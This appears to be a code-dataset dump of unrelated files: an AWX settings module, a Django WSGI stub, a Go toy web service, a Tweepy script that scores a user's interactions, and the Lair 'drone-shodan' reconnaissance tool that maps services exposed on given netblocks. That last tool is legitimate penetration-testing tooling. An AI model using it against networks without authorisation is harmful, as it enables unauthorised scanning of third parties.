# Available options: 'id', 'url', 'username', 'password', 'token', 'auth_url'
FALLBACK_GALAXY_SERVERS = []
# Enable bubblewrap support for running jobs (playbook runs only).
# Note: This setting may be overridden by database settings.
AWX_PROOT_ENABLED = True
# Command/path to bubblewrap.
AWX_PROOT_CMD = 'bwrap'
# Additional paths to hide from jobs using bubblewrap.
# Note: This setting may be overridden by database settings.
AWX_PROOT_HIDE_PATHS = []
# Additional paths to show for jobs using bubbelwrap.
# Note: This setting may be overridden by database settings.
AWX_PROOT_SHOW_PATHS = []
# The directory in which Tower will create new temporary directories for job
# execution and isolation (such as credential files and custom
# inventory scripts).
# Note: This setting may be overridden by database settings.
AWX_PROOT_BASE_PATH = "/tmp"
# Disable resource profiling by default
AWX_RESOURCE_PROFILING_ENABLED = False
# Interval (in seconds) between polls for cpu usage
AWX_RESOURCE_PROFILING_CPU_POLL_INTERVAL = '0.25'
# Interval (in seconds) between polls for memory usage
AWX_RESOURCE_PROFILING_MEMORY_POLL_INTERVAL = '0.25'
# Interval (in seconds) between polls for PID count
AWX_RESOURCE_PROFILING_PID_POLL_INTERVAL = '0.25'
# User definable ansible callback plugins
# Note: This setting may be overridden by database settings.
AWX_ANSIBLE_CALLBACK_PLUGINS = ""
# Automatically remove nodes that have missed their heartbeats after some time
AWX_AUTO_DEPROVISION_INSTANCES = False
# Enable Pendo on the UI, possible values are 'off', 'anonymous', and 'detailed'
# Note: This setting may be overridden by database settings.
PENDO_TRACKING_STATE = "off"
# Enables Insights data collection for Ansible Tower.
# Note: This setting may be overridden by database settings.
INSIGHTS_TRACKING_STATE = False
# Last gather date for Analytics
AUTOMATION_ANALYTICS_LAST_GATHER = None
AUTOMATION_ANALYTICS_INTERVAL = 14400
# Default list of modules allowed for ad hoc commands.
# Note: This setting may be overridden by database settings.
AD_HOC_COMMANDS = [
'command',
'shell',
'yum',
'apt',
'apt_key',
'apt_repository',
'apt_rpm',
'service',
'group',
'user',
'mount',
'ping',
'selinux',
'setup',
'win_ping',
'win_service',
'win_updates',
'win_group',
'win_user',
]
INV_ENV_VARIABLE_BLACKLIST = ("HOME", "USER", "_", "TERM")
# ----------------
# -- Amazon EC2 --
# ----------------
# AWS does not appear to provide pretty region names via any API, so store the
# list of names here. The available region IDs will be pulled from boto.
# http://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region
EC2_REGION_NAMES = {
'us-east-1': _('US East (Northern Virginia)'),
'us-east-2': _('US East (Ohio)'),
'us-west-2': _('US West (Oregon)'),
'us-west-1': _('US West (Northern California)'),
'ca-central-1': _('Canada (Central)'),
'eu-central-1': _('EU (Frankfurt)'),
'eu-west-1': _('EU (Ireland)'),
'eu-west-2': _('EU (London)'),
'ap-southeast-1': _('Asia Pacific (Singapore)'),
'ap-southeast-2': _('Asia Pacific (Sydney)'),
'ap-northeast-1': _('Asia Pacific (Tokyo)'),
'ap-northeast-2': _('Asia Pacific (Seoul)'),
'ap-south-1': _('Asia Pacific (Mumbai)'),
'sa-east-1': _('South America (Sao Paulo)'),
'us-gov-west-1': _('US West (GovCloud)'),
'cn-north-1': _('China (Beijing)'),
}
EC2_REGIONS_BLACKLIST = [
'us-gov-west-1',
'cn-north-1',
]
# Inventory variable name/values for determining if host is active/enabled.
EC2_ENABLED_VAR = 'ec2_state'
EC2_ENABLED_VALUE = 'running'
# Inventory variable name containing unique instance ID.
EC2_INSTANCE_ID_VAR = 'ec2_id'
# Filter for allowed group/host names when importing inventory from EC2.
EC2_GROUP_FILTER = r'^.+$'
EC2_HOST_FILTER = r'^.+$'
EC2_EXCLUDE_EMPTY_GROUPS = True
# ------------
# -- VMware --
# ------------
VMWARE_REGIONS_BLACKLIST = []
# Inventory variable name/values for determining whether a host is
# active in vSphere.
VMWARE_ENABLED_VAR = 'guest.gueststate'
VMWARE_ENABLED_VALUE = 'running'
# Inventory variable name containing the unique instance ID.
VMWARE_INSTANCE_ID_VAR = 'config.instanceuuid'
# Filter for allowed group and host names when importing inventory
# from VMware.
VMWARE_GROUP_FILTER = r'^.+$'
VMWARE_HOST_FILTER = r'^.+$'
VMWARE_EXCLUDE_EMPTY_GROUPS = True
VMWARE_VALIDATE_CERTS = False
# ---------------------------
# -- Google Compute Engine --
# ---------------------------
# It's not possible to get zones in GCE without authenticating, so we
# provide a list here.
# Source: https://developers.google.com/compute/docs/zones
GCE_REGION_CHOICES = [
('us-east1-b', _('US East 1 (B)')),
('us-east1-c', _('US East 1 (C)')),
('us-east1-d', _('US East 1 (D)')),
('us-east4-a', _('US East 4 (A)')),
('us-east4-b', _('US East 4 (B)')),
('us-east4-c', _('US East 4 (C)')),
('us-central1-a', _('US Central (A)')),
('us-central1-b', _('US Central (B)')),
('us-central1-c', _('US Central (C)')),
('us-central1-f', _('US Central (F)')),
('us-west1-a', _('US West (A)')),
('us-west1-b', _('US West (B)')),
('us-west1-c', _('US West (C)')),
('europe-west1-b', _('Europe West 1 (B)')),
('europe-west1-c', _('Europe West 1 (C)')),
('europe-west1-d', _('Europe West 1 (D)')),
('europe-west2-a', _('Europe West 2 (A)')),
('europe-west2-b', _('Europe West 2 (B)')),
('europe-west2-c', _('Europe West 2 (C)')),
('asia-east1-a', _('Asia East (A)')),
('asia-east1-b', _('Asia East (B)')),
('asia-east1-c', _('Asia East (C)')),
('asia-southeast1-a', _('Asia Southeast (A)')),
('asia-southeast1-b', _('Asia Southeast (B)')),
('asia-northeast1-a', _('Asia Northeast (A)')),
('asia-northeast1-b', _('Asia Northeast (B)')),
('asia-northeast1-c', _('Asia Northeast (C)')),
('australia-southeast1-a', _('Australia Southeast (A)')),
('australia-southeast1-b', _('Australia Southeast (B)')),
('australia-southeast1-c', _('Australia Southeast (C)')),
]
GCE_REGIONS_BLACKLIST = []
# Inventory variable name/value for determining whether a host is active
# in Google Compute Engine.
GCE_ENABLED_VAR = 'status'
GCE_ENABLED_VALUE = 'running'
# Filter for allowed group and host names when importing inventory from
# Google Compute Engine.
GCE_GROUP_FILTER = r'^.+$'
GCE_HOST_FILTER = r'^.+$'
GCE_EXCLUDE_EMPTY_GROUPS = True
GCE_INSTANCE_ID_VAR = 'gce_id'
# --------------------------------------
# -- Microsoft Azure Resource Manager --
# --------------------------------------
# It's not possible to get zones in Azure without authenticating, so we
# provide a list here.
AZURE_RM_REGION_CHOICES = [
('eastus', _('US East')),
('eastus2', _('US East 2')),
('centralus', _('US Central')),
('northcentralus', _('US North Central')),
('southcentralus', _('US South Central')),
('westcentralus', _('US West Central')),
('westus', _('US West')),
('westus2', _('US West 2')),
('canadaeast', _('Canada East')),
('canadacentral', _('Canada Central')),
('brazilsouth', _('Brazil South')),
('northeurope', _('Europe North')),
('westeurope', _('Europe West')),
('ukwest', _('UK West')),
('uksouth', _('UK South')),
('eastasia', _('Asia East')),
('southestasia', _('Asia Southeast')),
('australiaeast', _('Australia East')),
('australiasoutheast', _('Australia Southeast')),
('westindia', _('India West')),
('southindia', _('India South')),
('japaneast', _('Japan East')),
('japanwest', _('Japan West')),
('koreacentral', _('Korea Central')),
('koreasouth', _('Korea South')),
]
AZURE_RM_REGIONS_BLACKLIST = []
AZURE_RM_GROUP_FILTER = r'^.+$'
AZURE_RM_HOST_FILTER = r'^.+$'
AZURE_RM_ENABLED_VAR = 'powerstate'
AZURE_RM_ENABLED_VALUE = 'running'
AZURE_RM_INSTANCE_ID_VAR = 'id'
AZURE_RM_EXCLUDE_EMPTY_GROUPS = True
# ---------------------
# ----- OpenStack -----
# ---------------------
OPENSTACK_ENABLED_VAR = 'status'
OPENSTACK_ENABLED_VALUE = 'ACTIVE'
OPENSTACK_GROUP_FILTER = r'^.+$'
OPENSTACK_HOST_FILTER = r'^.+$'
OPENSTACK_EXCLUDE_EMPTY_GROUPS = True
OPENSTACK_INSTANCE_ID_VAR = 'openstack.id'
# ---------------------
# ----- oVirt4 -----
# ---------------------
RHV_ENABLED_VAR = 'status'
RHV_ENABLED_VALUE = 'up'
RHV_GROUP_FILTER = r'^.+$'
RHV_HOST_FILTER = r'^.+$'
RHV_EXCLUDE_EMPTY_GROUPS = True
RHV_INSTANCE_ID_VAR = 'id'
# ---------------------
# ----- Tower -----
# ---------------------
TOWER_ENABLED_VAR = 'remote_tower_enabled'
TOWER_ENABLED_VALUE = 'true'
TOWER_GROUP_FILTER = r'^.+$'
TOWER_HOST_FILTER = r'^.+$'
TOWER_EXCLUDE_EMPTY_GROUPS = True
TOWER_INSTANCE_ID_VAR = 'remote_tower_id'
# ---------------------
# ----- Foreman -----
# ---------------------
SATELLITE6_ENABLED_VAR = 'foreman.enabled'
SATELLITE6_ENABLED_VALUE = 'True'
SATELLITE6_GROUP_FILTER = r'^.+$'
SATELLITE6_HOST_FILTER = r'^.+$'
SATELLITE6_EXCLUDE_EMPTY_GROUPS = True
SATELLITE6_INSTANCE_ID_VAR = 'foreman.id'
# SATELLITE6_GROUP_PREFIX and SATELLITE6_GROUP_PATTERNS defined in source vars
# ---------------------
# ----- CloudForms -----
# ---------------------
CLOUDFORMS_ENABLED_VAR = 'cloudforms.power_state'
CLOUDFORMS_ENABLED_VALUE = 'on'
CLOUDFORMS_GROUP_FILTER = r'^.+$'
CLOUDFORMS_HOST_FILTER = r'^.+$'
CLOUDFORMS_EXCLUDE_EMPTY_GROUPS = True
CLOUDFORMS_INSTANCE_ID_VAR = 'cloudforms.id'
# ---------------------
# ----- Custom -----
# ---------------------
#CUSTOM_ENABLED_VAR =
#CUSTOM_ENABLED_VALUE =
CUSTOM_GROUP_FILTER = r'^.+$'
CUSTOM_HOST_FILTER = r'^.+$'
CUSTOM_EXCLUDE_EMPTY_GROUPS = False
#CUSTOM_INSTANCE_ID_VAR =
# ---------------------
# ----- SCM -----
# ---------------------
#SCM_ENABLED_VAR =
#SCM_ENABLED_VALUE =
SCM_GROUP_FILTER = r'^.+$'
SCM_HOST_FILTER = r'^.+$'
SCM_EXCLUDE_EMPTY_GROUPS = False
#SCM_INSTANCE_ID_VAR =
# ---------------------
# -- Activity Stream --
# ---------------------
# Defaults for enabling/disabling activity stream.
# Note: These settings may be overridden by database settings.
ACTIVITY_STREAM_ENABLED = True
ACTIVITY_STREAM_ENABLED_FOR_INVENTORY_SYNC = False
# Internal API URL for use by inventory scripts and callback plugin.
INTERNAL_API_URL = 'http://127.0.0.1:%s' % DEVSERVER_DEFAULT_PORT
CALLBACK_QUEUE = "callback_tasks"
SCHEDULER_QUEUE = "scheduler"
TASK_COMMAND_PORT = 6559
SOCKETIO_NOTIFICATION_PORT = 6557
SOCKETIO_LISTEN_PORT = 8080
FACT_CACHE_PORT = 6564
# Note: This setting may be overridden by database settings.
ORG_ADMINS_CAN_SEE_ALL_USERS = True
MANAGE_ORGANIZATION_AUTH = True
# Note: This setting may be overridden by database settings.
TOWER_URL_BASE = "https://towerhost"
INSIGHTS_URL_BASE = "https://example.org"
INSIGHTS_AGENT_MIME = 'application/example'
TOWER_SETTINGS_MANIFEST = {}
# Settings related to external logger configuration
LOG_AGGREGATOR_ENABLED = False
LOG_AGGREGATOR_TCP_TIMEOUT = 5
LOG_AGGREGATOR_VERIFY_CERT = True
LOG_AGGREGATOR_LEVEL = 'INFO'
# The number of retry attempts for websocket session establishment
# If you're encountering issues establishing websockets in clustered Tower,
# raising this value can help
CHANNEL_LAYER_RECEIVE_MAX_RETRY = 10
ASGI_APPLICATION = "awx.main.routing.application"
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [BROKER_URL],
"capacity": 10000,
},
},
}
# Logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
'require_debug_true_or_test': {
'()': 'awx.main.utils.RequireDebugTrueOrTest',
},
'external_log_enabled': {
'()': 'awx.main.utils.filters.ExternalLoggerEnabled'
},
'dynamic_level_filter': {
'()': 'awx.main.utils.filters.DynamicLevelFilter'
}
},
'formatters': {
'simple': {
'format': '%(asctime)s %(levelname)-8s %(name)s %(message)s',
},
'json': {
'()': 'awx.main.utils.formatters.LogstashFormatter'
},
'timed_import': {
'()': 'awx.main.utils.formatters.TimeFormatter',
'format': '%(relativeSeconds)9.3f %(levelname)-8s %(message)s'
},
'dispatcher': {
'format': '%(asctime)s %(levelname)-8s %(name)s PID:%(process)d %(message)s',
},
},
'handlers': {
'console': {
'()': 'logging.StreamHandler',
'level': 'DEBUG',
'filters': ['require_debug_true_or_test'],
'formatter': 'simple',
},
'null': {
'class': 'logging.NullHandler',
},
'file': {
'class': 'logging.NullHandler',
'formatter': 'simple',
},
'syslog': {
'level': 'WARNING',
'filters': ['require_debug_false'],
'class': 'logging.NullHandler',
'formatter': 'simple',
},
'external_logger': {
'class': 'awx.main.utils.handlers.AWXProxyHandler',
'formatter': 'json',
'filters': ['external_log_enabled', 'dynamic_level_filter'],
},
'tower_warnings': {
# don't define a level here, it's set by settings.LOG_AGGREGATOR_LEVEL
'class': 'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false', 'dynamic_level_filter'],
'filename': os.path.join(LOG_ROOT, 'tower.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'callback_receiver': {
# don't define a level here, it's set by settings.LOG_AGGREGATOR_LEVEL
'class': 'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false', 'dynamic_level_filter'],
'filename': os.path.join(LOG_ROOT, 'callback_receiver.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'dispatcher': {
# don't define a level here, it's set by settings.LOG_AGGREGATOR_LEVEL
'class': 'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false', 'dynamic_level_filter'],
'filename': os.path.join(LOG_ROOT, 'dispatcher.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'dispatcher',
},
'celery.beat': {
'class':'logging.StreamHandler',
'level': 'ERROR'
}, # don't log every celerybeat wakeup
'inventory_import': {
'level': 'DEBUG',
'class':'logging.StreamHandler',
'formatter': 'timed_import',
},
'task_system': {
# don't define a level here, it's set by settings.LOG_AGGREGATOR_LEVEL
'class': 'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false', 'dynamic_level_filter'],
'filename': os.path.join(LOG_ROOT, 'task_system.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'management_playbooks': {
'level': 'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false'],
'filename': os.path.join(LOG_ROOT, 'management_playbooks.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'system_tracking_migrations': {
'level': 'WARNING',
'class':'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false'],
'filename': os.path.join(LOG_ROOT, 'tower_system_tracking_migrations.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'rbac_migrations': {
'level': 'WARNING',
'class':'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false'],
'filename': os.path.join(LOG_ROOT, 'tower_rbac_migrations.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
},
'loggers': {
'django': {
'handlers': ['console'],
},
'django.request': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'WARNING',
},
'celery': { # for celerybeat connection warnings
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'WARNING',
},
'rest_framework.request': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'WARNING',
'propagate': False,
},
'py.warnings': {
'handlers': ['console'],
},
'awx': {
'handlers': ['console', 'file', 'tower_warnings', 'external_logger'],
'level': 'DEBUG',
},
'awx.conf': {
'handlers': ['null'],
'level': 'WARNING',
},
'awx.conf.settings': {
'handlers': ['null'],
'level': 'WARNING',
},
'awx.main': {
'handlers': ['null']
},
'awx.main.commands.run_callback_receiver': {
'handlers': ['callback_receiver'], # level handled by dynamic_level_filter
},
'awx.main.dispatch': {
'handlers': ['dispatcher'],
},
'awx.isolated.manager.playbooks': {
'handlers': ['management_playbooks'],
'propagate': False
},
'awx.main.commands.inventory_import': {
'handlers': ['inventory_import'],
'propagate': False
},
'awx.main.tasks': {
'handlers': ['task_system', 'external_logger'],
'propagate': False
},
'awx.main.scheduler': {
'handlers': ['task_system', 'external_logger'],
'propagate': False
},
'awx.main.access': {
'level': 'INFO', # very verbose debug-level logs
},
'awx.main.signals': {
'level': 'INFO', # very verbose debug-level logs
},
'awx.api.permissions': {
'level': 'INFO', # very verbose debug-level logs
},
'awx.analytics': {
'handlers': ['external_logger'],
'level': 'INFO',
'propagate': False
},
'django_auth_ldap': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'DEBUG',
},
'social': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'DEBUG',
},
'system_tracking_migrations': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'DEBUG',
},
'rbac_migrations': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'DEBUG',
},
}
}
LOG_AGGREGATOR_AUDIT = False
# Apply coloring to messages logged to the console
COLOR_LOGS = False
# https://github.com/django-polymorphic/django-polymorphic/issues/195
# FIXME: Disabling models.E006 warning until we can renamed Project and InventorySource
SILENCED_SYSTEM_CHECKS = ['models.E006']
# Use middleware to get request statistics
AWX_REQUEST_PROFILE = False
#
# Optionally, AWX can generate DOT graphs
# (http://www.graphviz.org/doc/info/lang.html) for per-request profiling
# via gprof2dot (https://github.com/jrfonseca/gprof2dot)
#
# If you set this to True, you must `/var/lib/awx/venv/awx/bin/pip install gprof2dot`
# .dot files will be saved in `/var/log/tower/profile/` and can be converted e.g.,
#
# ~ yum install graphviz
# ~ dot -o profile.png -Tpng /var/log/tower/profile/some-profile-data.dot
#
AWX_REQUEST_PROFILE_WITH_DOT = False
# Allow profiling callback workers via SIGUSR1
AWX_CALLBACK_PROFILE = False
# Delete temporary directories created to store playbook run-time
AWX_CLEANUP_PATHS = True
MIDDLEWARE = [
'awx.main.middleware.TimingMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'awx.main.middleware.MigrationRanCheckMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'awx.sso.middleware.SocialAuthMiddleware',
'crum.CurrentRequestUserMiddleware',
'awx.main.middleware.URLModificationMiddleware',
'awx.main.middleware.SessionTimeoutMiddleware',
]
# Secret header value to exchange for websockets responsible for distributing websocket messages.
# This needs to be kept secret and randomly generated
BROADCAST_WEBSOCKET_SECRET = ''
# Port for broadcast websockets to connect to
# Note: that the clients will follow redirect responses
BROADCAST_WEBSOCKET_PORT = 443
# Whether or not broadcast websockets should check nginx certs when interconnecting
BROADCAST_WEBSOCKET_VERIFY_CERT = False
# Connect to other AWX nodes using http or https
BROADCAST_WEBSOCKET_PROTOCOL = 'https'
# All websockets that connect to the broadcast websocket endpoint will be put into this group
BROADCAST_WEBSOCKET_GROUP_NAME = 'broadcast-group_send'
# Time wait before retrying connecting to a websocket broadcast tower node
BROADCAST_WEBSOCKET_RECONNECT_RETRY_RATE_SECONDS = 5
# How often websocket process will look for changes in the Instance table
BROADCAST_WEBSOCKET_NEW_INSTANCE_POLL_RATE_SECONDS = 10
# How often websocket process will generate stats
BROADCAST_WEBSOCKET_STATS_POLL_RATE_SECONDS = 5
| []
| []
| []
| [] | [] | python | 0 | 0 | |
Learning/wsgi.py | """
WSGI config for Learning project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Learning.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
main.go | package main
import (
"bufio"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"log"
"net"
"net/url"
"os"
"strconv"
"strings"
"sync"
"time"
"github.com/lair-framework/api-server/client"
"github.com/lair-framework/go-lair"
"github.com/tomsteele/go-shodan"
)
const (
version = "1.0.2"
tool = "shodan"
osWeight = 50
usage = `
Provided a newline delimited file containing cidr netblocks or ip
addresses, this drone uses shodan's 'net' and 'host' search operators to identify and import available
services into lair. Requests are made to shodan concurrently using a pool of 10 goroutines.
Usage:
drone-shodan [options] <id> <filename>
export LAIR_ID=<id>; drone-shodan [options] <filename>
Options:
-v show version and exit
-h show usage and exit
-k allow insecure SSL connections
-force-ports disable data protection in the API server for excessive ports
-tags a comma separated list of tags to add to every host that is imported
`
)
func removeDuplicates(in []string) []string {
m := map[string]bool{}
out := []string{}
for _, i := range in {
if i == "" {
continue
}
if _, ok := m[i]; ok {
continue
}
m[i] = true
out = append(out, i)
}
return out
}
func shodanIPsFromShodanNetSearch(client *shodan.Client, netblock string) ([]string, error) {
ips := []string{}
result, err := client.HostSearch("net:"+netblock, []string{}, url.Values{})
if err != nil {
return ips, err
}
for _, m := range result.Matches {
ips = append(ips, m.IPStr)
}
return ips, nil
}
func gatherIPsToSearch(sclient *shodan.Client, filename string) ([]string, error) {
ips := []string{}
cidrs := []string{}
file, err := os.Open(filename)
if err != nil {
log.Fatalf("Fatal: Could not open file. Error %s", err.Error())
}
defer file.Close()
scanner := bufio.NewScanner(file)
for scanner.Scan() {
line := scanner.Text()
_, _, err := net.ParseCIDR(line)
if err != nil {
ip := net.ParseIP(line)
if ip == nil {
log.Fatalf("Fatal: %s in file is not an ip or cidr netblock", ip)
}
ips = append(ips, line)
} else {
cidrs = append(cidrs, line)
}
}
if len(cidrs) > 0 {
lk := sync.Mutex{}
wg := sync.WaitGroup{}
wg.Add(10)
cidrsChan := make(chan string, 10)
for i := 0; i < 10; i++ {
go func(s shodan.Client) {
for cidr := range cidrsChan {
hostCount, err := s.HostCount("net:"+cidr, []string{})
if err != nil {
log.Fatalf("Fatal: Error returned from shodan. Error %s", err.Error())
}
time.Sleep(5*time.Second)
if hostCount.Total > 0 {
if netIPs, err := shodanIPsFromShodanNetSearch(sclient, cidr); err != nil {
log.Fatalf("Fatal: Error returned from shodan. Error %s", err.Error())
} else {
lk.Lock()
ips = append(ips, netIPs...)
lk.Unlock()
}
time.Sleep(5*time.Second)
}
}
wg.Done()
}(*sclient)
}
for _, cidr := range cidrs {
cidrsChan <- cidr
}
close(cidrsChan)
wg.Wait()
}
return ips, nil
}
func main() {
showVersion := flag.Bool("v", false, "")
insecureSSL := flag.Bool("k", false, "")
forcePorts := flag.Bool("force-ports", false, "")
tags := flag.String("tags", "", "")
flag.Usage = func() {
fmt.Println(usage)
}
flag.Parse()
if *showVersion {
log.Println(version)
os.Exit(0)
}
lairURL := os.Getenv("LAIR_API_SERVER")
if lairURL == "" {
log.Fatal("Fatal: Missing LAIR_API_SERVER environment variable")
}
lairPID := os.Getenv("LAIR_ID")
var filename string
switch len(flag.Args()) {
case 2:
lairPID = flag.Arg(0)
filename = flag.Arg(1)
case 1:
filename = flag.Arg(0)
default:
log.Fatal("Fatal: Missing required argument")
}
if lairPID == "" {
log.Fatal("Fatal: Missing LAIR_ID")
}
u, err := url.Parse(lairURL)
if err != nil {
log.Fatalf("Fatal: Error parsing LAIR_API_SERVER URL. Error %s", err.Error())
}
if u.User == nil {
log.Fatal("Fatal: Missing username and/or password")
}
user := u.User.Username()
pass, _ := u.User.Password()
if user == "" || pass == "" {
log.Fatal("Fatal: Missing username and/or password")
}
c, err := client.New(&client.COptions{
User: user,
Password: pass,
Host: u.Host,
Scheme: u.Scheme,
InsecureSkipVerify: *insecureSSL,
})
if err != nil {
log.Fatalf("Fatal: Error setting up client: Error %s", err.Error())
}
hostTags := []string{}
if *tags != "" {
hostTags = strings.Split(*tags, ",")
}
l := lair.Project{
ID: lairPID,
Tool: tool,
Commands: []lair.Command{lair.Command{
Tool: tool,
Command: "",
}},
}
shodanKey := os.Getenv("SHODAN_KEY")
if shodanKey == "" {
log.Fatal("Fatal: Missing SHODAN_KEY environment variable")
}
sclient := shodan.New(shodanKey)
serviceMap, err := sclient.Services()
if err != nil {
log.Fatalf("Fatal: Error getting services from shodan. Error %s", err.Error())
}
ips := []string{}
ips, err = gatherIPsToSearch(sclient, filename)
if err != nil {
log.Fatalf("Fatal: Can't gather IPs from file %s: error %s", filename, err.Error())
}
lk := sync.Mutex{}
wg := sync.WaitGroup{}
wg.Add(10)
ipChan := make(chan string, 10)
for i := 0; i < 10; i++ {
go func(s shodan.Client) {
for ip := range ipChan {
time.Sleep(10*time.Second)
host, err := s.Host(ip, url.Values{})
if err != nil {
log.Printf("Error: Error returned from shodan for %s. Error %s", ip, err.Error())
continue
}
h := lair.Host{
Hostnames: host.Hostnames,
IPv4: ip,
LastModifiedBy: tool,
Tags: hostTags,
}
for _, d := range host.Data {
service := lair.Service{
Port: d.Port,
Protocol: "tcp",
Service: serviceMap[strconv.Itoa(d.Port)],
Product: d.Product,
Notes: []lair.Note{lair.Note{
Title: "Shodan Banner",
Content: d.Data,
LastModifiedBy: tool,
}},
}
if fingerprint, ok := d.Os.(string); ok {
h.OS = lair.OS{
Fingerprint: fingerprint,
Weight: osWeight,
Tool: tool,
}
}
h.Hostnames = removeDuplicates(append(h.Hostnames, d.Hostnames...))
h.Services = append(h.Services, service)
}
lk.Lock()
l.Hosts = append(l.Hosts, h)
lk.Unlock()
}
wg.Done()
}(*sclient)
}
for _, ip := range ips {
ipChan <- ip
}
close(ipChan)
wg.Wait()
res, err := c.ImportProject(&client.DOptions{ForcePorts: *forcePorts}, &l)
if err != nil {
log.Fatalf("Fatal: Unable to import project. Error %s", err)
}
defer res.Body.Close()
droneRes := &client.Response{}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
log.Fatalf("Fatal: Error %s", err.Error())
}
if err := json.Unmarshal(body, droneRes); err != nil {
log.Fatalf("Fatal: Could not unmarshal JSON. Error %s", err.Error())
}
if droneRes.Status == "Error" {
log.Fatalf("Fatal: Import failed. Error %s", droneRes.Message)
}
log.Println("Success: Operation completed successfully")
}
| [
"\"LAIR_API_SERVER\"",
"\"LAIR_ID\"",
"\"SHODAN_KEY\""
]
| []
| [
"LAIR_ID",
"LAIR_API_SERVER",
"SHODAN_KEY"
]
| [] | ["LAIR_ID", "LAIR_API_SERVER", "SHODAN_KEY"] | go | 3 | 0 | |
snack/main.go | package main
import (
"fmt"
"html/template"
"log"
"math/rand"
"net/http"
"os"
"path/filepath"
"time"
)
func main() {
// The next line creates an error on startup; uncomment it to cause a CrashLoopBackOff
// log.Fatal("Can't Find Necessary Resource File; dying")
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
// The next line creates an error on request time; uncomment it to cause an error on request.
// log.Fatal("NullPointerError trying to service a request")
snacks := [...]string{
"Spam Musubi",
"Pocky Sticks",
"Kasugai Gummy",
"Green Tea Mochi",
"Shrimp-flavored Chips",
"Red Bean Rice Cake",
"Pretz Sticks",
"Peaches in Agar Jelly",
}
rand.Seed(time.Now().Unix())
s := snacks[rand.Intn(len(snacks))]
t, err := template.ParseFiles(templatePath("index.tpl"))
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "error parsing template: %v\n", err)
return
}
err = t.Execute(w, s)
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "error executing template: %v\n", err)
return
}
})
log.Println("Starting Snack Service on :8083")
log.Fatal(http.ListenAndServe(":8083", nil))
}
func templatePath(f string) string {
dir := os.Getenv("TEMPLATE_DIR")
return filepath.Join(dir, f)
}
| [
"\"TEMPLATE_DIR\""
]
| []
| [
"TEMPLATE_DIR"
]
| [] | ["TEMPLATE_DIR"] | go | 1 | 0 | |
main.py | import tweepy
import math
from PIL import Image
import urllib.request
import random
import glob
import os
import math
auth = tweepy.OAuthHandler(os.environ["CONSUMER_KEY"], os.environ["CONSUMER_SECRET"])
auth.set_access_token(os.environ["ACCESS_TOKEN"],os.environ["ACCESS_TOKEN_SECRET"])
api = tweepy.API(auth)
max_tweets_check_limit = 3000
min_score = 10
target_username = "tdxf20".lower()
interacted_users = {}
user_profil_url = {}
count = 0
def update_interacted_users(username, value, profil_url):
username = username.lower()
if username in interacted_users.keys():
interacted_users[username] += value
else:
interacted_users[username] = value
user_profil_url[username] = profil_url
try:
for status in tweepy.Cursor(api.user_timeline,screen_name=target_username,tweet_mode="extended").items():
tweettext = str(status.full_text.lower().encode("ascii",errors="ignore"))
if "rt @" in tweettext:
retweet_username = tweettext.split(":")[0].split("@")[1]
update_interacted_users(retweet_username, 3,None)
print(f"{retweet_username} gets 3 score")
continue
if not status.entities["user_mentions"]:
continue
for user in status.entities["user_mentions"]:
name = user["screen_name"]
print(f"{name} gets 2 score")
update_interacted_users(name ,2,None)
if count == max_tweets_check_limit:
break
count += 1
except:
pass
try:
for status in tweepy.Cursor(api.favorites,screen_name=target_username).items():
print(f"{status.user.screen_name.lower()} gets 1 score")
update_interacted_users(status.user.screen_name.lower(), 1, status.user.profile_image_url)
if count == max_tweets_check_limit:
break
count += 1
except:
pass
interacted_users = {k:v for k,v in interacted_users.items() if v >= min_score and k != target_username}
user_profil_url = {k:v for k,v in user_profil_url.items() if k in interacted_users.keys()}
urllib.request.urlretrieve(api.get_user(target_username).profile_image_url,f"{target_username}.png")
for name, url in user_profil_url.items():
try:
if url == None:
